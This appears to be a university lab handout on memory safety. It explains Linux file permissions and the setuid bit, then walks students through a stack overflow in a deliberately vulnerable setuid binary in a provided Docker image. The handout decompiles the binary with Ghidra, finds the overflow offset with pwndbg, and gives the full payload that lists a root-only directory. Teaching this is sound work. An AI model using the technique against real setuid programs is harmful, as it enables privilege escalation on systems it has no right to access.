Setuid Programs

We saw in the last exercise that we can use stack overflows to bypass authentication methods. Here, we assume a scenario where the goal is to bypass file system permission checks and list the content of a directory we are not supposed to access. To that aim we are going to exploit a particular type of programs that run with the permissions of the user owning them, and not with the permissions of the user executing them: setuid binaries.

Understanding Linux File Permissions

Before we start working with setuid programs, let's explore how Linux file permissions and setuid work.

File Ownership

On a Linux system, every file and directory has 2 different kinds of owners:

User owner (UID) - The account that "owns" the file.
Group owner (GID) - A group of accounts that share certain permissions on the file.

Taking the example of a computer shared between different users, e.g. a lab machine at the University, you have a user account and your personal files in your home folder are set to be accessible only by your account: you cannot access files belonging to other students, and neither can they access your own files. Students also cannot access the files belonging to the system administrator (root). The administrator can assign students to specific groups, for example comp60261, so that file permissions for all users on the course can be set simultaneously.

You can view who owns a file using ls -l. Let's have a look at what this command says when we examine the ls command's binary:

$ ls -l /usr/bin/cp
-rwxr-xr-x 1 root root 151152 Sep 20  2022 /usr/bin/cp

Breaking this down:

-rwxr-xr-x - The first part shows us the type and permission bits
1 - The number of hard links
root - The user owner
root - The group owner
151152 - The file size in bytes
The rest is the modification timestamp and file/directory.

Permission Bits

To see what permissions each of the types of users has, we refer to the permission bits. They are displayed as a series of 10 characters. The first letter is the file type: - for a regular file, d for a directory, l for a symbolic link, etc.

Next come the permissions themselves: 3 blocks of 3 characters each. The first block relates to the permissions of the file's owner, the second to the permissions of the file's group, and the third to the permission of all other users not falling within the 2 aforementioned categories.

Each block has 3 characters. The first relates to read permission: the entity concerned by the block can have read access to the file (r) or not (-). The second character denotes write access (w) or not (-). The third denotes execution access (x) or not (-). For a file it means the concerned entity can run it as a program (e.g. with ./file), and for a folder it means the entity can list the content of that folder.

This is all illustrated here:

So we can see that the file /usr/bin/cp is readable, writable, and executable by its owner root, and can only be read and executed by all other users including other members of the root group.

Numeric permission notations

Permissions can also be written as three digits:

r = 4
w = 2
x = 1

These can be added together to represent a combination of permissions. For example:

rwx = 4 + 2 + 1 = 7
rw- = 4 + 2 = 6
r-x = 4 + 1 = 5

You can set file permissions numerically with chmod. For example if we want to create a file containing sensitive data and have it being accessible only by our user in read/write mode:

$ echo "secret" > file.txt
$ chmod 600 file.txt

Or alternatively using letters:

$ chmod u+x file.txt   # Add(+) the execute(x) permission to the user(u)
$ chmod g-w file.txt   # Remove(-) the write(w) permission from the group(g)

You can also change the owner and group of a file with chown:

chown emily file.txt   # Change the owner of file.txt to emily
chgrp comp60261 file.txt    # Change the group of file.txt to comp60261

`setuid` bit

For certain programs, the x of the execution permissions is replaced by an s. This is the setuid bit: it indicates that the program in question will run with the level of privileges (i.e. file system permissions) of the file owner instead of the privileges of the user who runs it.

To see an example of this, see the permissions of the /usr/bin/passwd program, which allows users to change their password:

> ls -l /usr/bin/passwd
-rwsr-xr-x 1 root root 68248 Mar 23  2023 /usr/bin/passwd

This tells us that when the passwd file is executed, it runs with the privileges of its owner, root. This is necessary because the system's passwords are stored in a file that can understandably only be written by root, /etc/shadow. However, non-root users must still be able to change their passwords, i.e. to run passwd. As a result system permissions are set up so that:

/etc/shadow is only accessible by root.
passwd is owned by root and executable by all users.
When passwd executes it actually runs with the permissions of root, hence it can edit /etc/shadow.

Although it is necessary for certain scenarios such as the one we just described, letting users execute programs with root permissions is obviously quite concerning from the security point of view. This is why you will find a very small number of setuid programs on a standard Linux system.

In this exercise, we will exploit a vulnerability in an setuid program to access, as a non-privileged user, files that are supposed to be only accessed by root.

Exercise Setup

For this exercise you need to run a particular Docker image: olivierpierre/comp60261-setuid. To that aim install the Docker command line engine and in a terminal run:

docker run -it olivierpierre/comp60261-setuid

You can then optionally attach vscode to the container. Open a workspace in the folder /home/user/workspace.

Note: this is an x86-64 Docker image, which may not work if you have an ARM-based MacBook. If you have an ARM MacBook an alternative is to use GitHub CodeSpaces, the exercise should be doable with the free tier available with GitHub student accounts. To launch a CodeSpace with the exercise's image, click here.

A third option (with Docker installed on an x86-64 machine) is to run this devcontainer. Once vscode has loaded the devcontainer, have it load the proper workspace by bringing up a terminal and entering:

code /home/user/workspace

Our Target Program

The setuid program we aim to exploit is in the workspace folder, named setuid01:

$ ls -l
total 28
drwx------ 1 root root  4096 Aug 20 14:58 private
drwxr-xr-x 1 user user  4096 Aug 20 15:04 public
-rwsr-xr-x 1 root root 14624 Aug 20 14:59 setuid01

There are also 2 folders: one named public is accessible by your user, and contains 3 files owned by that user:

$ ls public/
bread  cake  pasta

These are cooking recipes for various types of meals. The other, private, is owned by root and inaccessible by our user:

$ ls private/
ls: cannot open directory 'private/': Permission denied

The goal of the exercise is to list the content of that folder by exploiting the setuid binary.

The binary takes a name as command line parameter and list the available recipes i.e. the files contained in the public directory:

$ ./setuid01 
Usage: ./setuid01 <your name>
$ ./setuid01 pierre
Hello pierre, the recipes available are:
total 12
-rw-r--r-- 1 root root 58 Aug 18 15:00 bread
-rw-r--r-- 1 root root 55 Aug 18 15:00 cake
-rw-r--r-- 1 root root 49 Aug 18 15:00 pasta

This looks very much like the output of ls -l, and it is likely that setuid01 is calling that program under the hood.

Decompiling `setuid01`

Let's decompile that program with RetDec:

retdec-decompiler setuid01
cat setuid01.c

From RetDec's output we can see that the program indeed invokes the ls binary with execlp, which is a libc function to run binaries. The binary to run, and its command line arguments are passed as follows:

int execlp(char *file, char *arg0, ..., (char *) NULL);

execlp takes the name of the binary (searched in the $PATH), followed by a list of arguments -- with the second argument (here arg0) being always the name of the binary i.e. the same as the first. For example to invoke the command cat /home/pierre/test.txt one would call:

execlp("cat", "cat", "/home/pierre/test.txt", NULL);

As one can observe the list of arguments for the invocation of execlp in RetDec's output seems incomplete, e.g. the NULL closing argument is missing, so is the name of the target folder. Decompiling is never an exact science, and we are hitting one of RetDec's limitations here. Ghidra is a bit better at decompiling setuid01 here. It outputs the following:

bool main(int param_1,undefined8 *param_2) {
  char local_28 [24];
  undefined8 local_10;
  
  local_10 = 0x63696c627570;
  local_28[0] = '\0';
  // ...
  if (param_1 < 2) {
    printf("Usage: %s <your name>\n",*param_2);
  }
  else {
    strcpy(local_28,(char *)param_2[1]);
    printf("Hello %s, the recipes available are:\n");
    execlp("ls","ls",&DAT_00402046,&local_10,0);
  }
  return param_1 < 2;
}

Now we can see the other parameters passed to execlp. Double-clicking on DAT_00402046 in Ghidra will show that it is -l, the first command line parameter passed to ls.

The second command line parameter is local_10 and it seems to be at a first glance an integer, with a value of 0x63696c627570. However, we know that execlp takes only string parameters, set aside the last one which is always NULL. We can try to interpret the value of local_10 as a C (ASCII) string, for example by using an hexadecimal to ASCII converter. The converter tells us that this value translates to cilbup. Recall that numbers are stored in a little endian fashion on x86-64, so we need to invert these bytes: the string is public, it is indeed the last command line parameter passed to ls.

Now we know that we have a setuid program that list the content of a folder with root privileges. If we can replace the value of the public string with private, we will reach our goal and list the content of that folder with the permission of the owner: root. The good thing here is that we can see an unprotected call to strcpy into local_28 from param2[1], which is actually argv[1]. We can use that overflow to overwrite local_10: recall that the stack grows down with x86-64 so local_10 is likely located at a higher address vs. local_28 i.e. in the proper overflow direction.

Preparing the Payload

Let's run the program in Pwndbg (available in the Docker image) and use cyclic to check how much passing we need to pass to overflow the string containing public.

$ pwndbg setuid01
# Run the program once to avoid cyclic misbehaving
pwndbg> run
# Generate a cyclic pattern
pwndbg> cyclic 200
# Copy and paste your cyclic pattern and pass it as the command line parameter to setuid01
pwndbg> run aaaaaa # ...
ls: cannot access 'daaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaa': No such file or directory
# Now let's see the offset in the pattern for what ls takes as target directory after the overflow:
pwndbg> cyclic -l daaaaaaa
Finding cyclic pattern of 8 bytes: b'daaaaaaa' (hex: 0x6461616161616161)
Found at offset 24

And we have our padding. Note that your pattern may be different so make sure to pass the first 8 bytes of what ls reports it can access to cyclic -l. Our payload will then be: 24 bytes of padding, then the ASCII string "private".

Launching the Attack

Launch the attack with the aforementioned payload:

$ ./setuid01 AAAAAAAAAAAAAAAAAAAAAAAAprivate

This should display the content of the private folder. It contains a file which name will give you the root password that you can submit to complete the exercise. To check that this password is correct you can try to log in as root with the su command, or use the web app.

Submission

Fill in the corresponding line in the CSV file on the submission git repository, i.e.:

setuid01,password-here

Keyboard shortcuts

COMP60261 Lab 2: Memory Safety